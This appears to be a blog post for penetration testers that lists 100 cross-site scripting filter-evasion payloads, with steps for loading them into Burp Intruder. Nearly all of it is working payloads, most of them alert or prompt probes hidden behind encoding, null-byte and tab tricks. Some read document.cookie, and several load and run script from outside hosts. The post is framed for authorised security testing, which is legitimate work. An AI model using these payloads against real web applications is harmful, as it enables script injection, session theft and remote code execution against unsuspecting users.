XSS payloads you may need as a pen-tester

Below you can find a hundred XSS payloads that you can use to find XSS bugs in web applications.

There are really good ones mentioned by Rsnake (of SlowLoris fame) which he’s donated to OWASP and it can be found here: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

I use these as a list within Burp Intruder. You can add these to Burp using the following options:

1. Send the request you want to analyse to Burp Intruder by right clicking or command clicking on the intercepted request/ response

2. Go to Burp Intruder > Payloads > Payload Type – Simple List > Paste in Payload Options

3. Start attack

So, here goes:

All the attack payloads work like a charm in Chrome 🙂 I have also specified the browser name alongside the payloads that don’t work in Chrome.
1) <iframe %00 src=”&Tab;javascript:prompt(1)&Tab;”%00>

2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>’

3) <input/onmouseover=”javaSCRIPT&colon;confirm&lpar;1&rpar;”

4) <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}

5) <img/src=`%00` onerror=this.onerror=confirm(1)

6) <form><isindex formaction=”javascript&colon;confirm(1)”

7) <img src=`%00`&NewLine; onerror=alert(1)&NewLine;

8) <script/&Tab; src=’https://dl.dropbox.com/u/13018058/js.js’ /&Tab;></script>

9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

10) <iframe/src=”data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>

11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

12) &#34;&#62;<h1/onmouseover=’\u0061lert(1)’>%00

13) <iframe/src=”data:text/html,<svg &#111;&#110;load=alert(1)>”>

14) <meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>

15) <svg><script xlink:href=data&colon;,window.open(‘https://www.google.com/’)></script

16) <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js’ {Opera}

17) <meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”>

18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

19) <form><a href=”javascript:\u0061lert&#x28;1&#x29;”>X

20) </script><img/*%00/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/%00*/onerror=’eval(src)’>

21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

22) <form><iframe &#09;&#10;&#11; src=”javascript&#58;alert(1)”&#11;&#10;&#09;;>

23) <a href=”data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”&#09;&#10;&#11;>X</a

24) http://www.google<script .com>alert(document.location)</script

25) <a&#32;href&#61;&#91;&#00;&#93;”&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;”>XYZ</a

26) <img/src=@&#32;&#13; onerror = prompt(‘&#49;’)

27) <style/onload=prompt&#40;’&#88;&#83;&#83;’&#41;

28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; 🙁

30) &#00;</form><input type&#61;”date” onfocus=”alert(1)”>

31) <form><textarea &#13; onkeyup=’\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;’>

32) <script /***/>/***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/

33) <iframe srcdoc=’&lt;body onload=prompt&lpar;1&rpar;&gt;’>

34) <a href=”javascript:void(0)” onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

35) <script ~~~>alert(0%0)</script ~~~>

36) <style/onload=&lt;!–&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

37) <///style///><span %2F onmousemove=’alert&lpar;1&rpar;’>SPAN

38) <img/src=’http://i.imgur.com/P8mL8.jpg’ onmouseover=&Tab;prompt(1)

39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>’

40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

41) <marquee onstart=’javascript:alert&#x28;1&#x29;’>^__^

42) <div/style=”width:expression(confirm(1))”>X</div> {IE7}

43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)

44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=’submit’>//

45) /*iframe/src*/<iframe/src=”<iframe/src=@”/onload=prompt(1) /*iframe/src*/>

46) //|\\ <script //|\\ src=’https://dl.dropbox.com/u/13018058/js.js’> //|\\ </script //|\\

47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

48) <a/href=”javascript:&#13; javascript:prompt(1)”><input type=”X”>

49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

50) </svg>”<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert&#x28;1&#x29; {Opera}

51) <a href=”javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;”><button>

52) <div onmouseover=’alert&lpar;1&rpar;’>DIV</div>

53) <iframe style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)”>

54) <a href=”jAvAsCrIpT&colon;alert&lpar;1&rpar;”>X</a>

55) <embed src=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf”>

56) <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf”>

57) <var onmouseover=”prompt(1)”>On Mouse Over</var>
58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

59) <img src=”/” =_=” title=”onerror=’prompt(1)'”>

60) <%<!–‘%><script>alert(1);</script –>

61) <script src=”data:text/javascript,alert(1)”></script>

62) <iframe/src \/\/onload = prompt(1)

63) <iframe/onreadystatechange=alert(1)

64) <svg/onload=alert(1)

65) <input value=<><iframe/src=javascript:confirm(1)

66) <input type=”text” value=“ <div/onmouseover=’alert(1)’>X</div>

67) http://www.<script>alert(1)</script .com

68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

69) <svg><script ?>alert(1)

70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

71) <img src=`xx:xx`onerror=alert(1)>

72)
73) <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>

74) <math><a xlink:href=”//jsfiddle.net/t846h/”>click

75) <embed code=”http://businessinfo.co.uk/labs/xss/xss.swf” allowscriptaccess=always>

76) <svg contentScriptType=text/vbs><script>MsgBox+1

77) <a href=”data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>”>X</a

78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(‘\u0061′) worksinIE>

79) <script>~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061’)</script U+

80) <script/src=”data&colon;text%2Fj\u0061v\u0061script,\u0061lert(‘\u0061′)”></script a=\u0061 & /=%2F

81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

83) <script>+-+-1-+-+alert(1)</script>

84) <body/onload=&lt;!–&gt;&#10alert(1)>

85) <script itworksinallbrowsers>/*<script* */alert(1)</script

86) <img src ?itworksonchrome?\/onerror = alert(1)

87) <svg><script>//&NewLine;confirm(1);</script </svg>

88) <svg><script onlypossibleinopera:-)> alert(1)

89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

90) <script x> alert(1) </script 1=2

91) <div/onmouseover=’alert(1)’> style=”x:”>

92) <–`<img/src=` onerror=alert(1)> –!>

93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

94) <div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>

95) “><img src=x onerror=window.open(‘https://www.google.com/’);>

96) <form><button formaction=javascript&colon;alert(1)>CLICKME

97) <math><a xlink:href=”//jsfiddle.net/t846h/”>click

98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

99) <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>

100) <a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203″>Click Me</a>

Please ensure you remove spaces before hitting enter in the browser or add a “+” or %3d or something like that

Hope you find these XSS payloads useful for your upcoming pen-tests

1 Comment

  • Yahya Reply

    March 30, 2016 at 5:49 am

    Thank you so much man

Leave a Comment

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register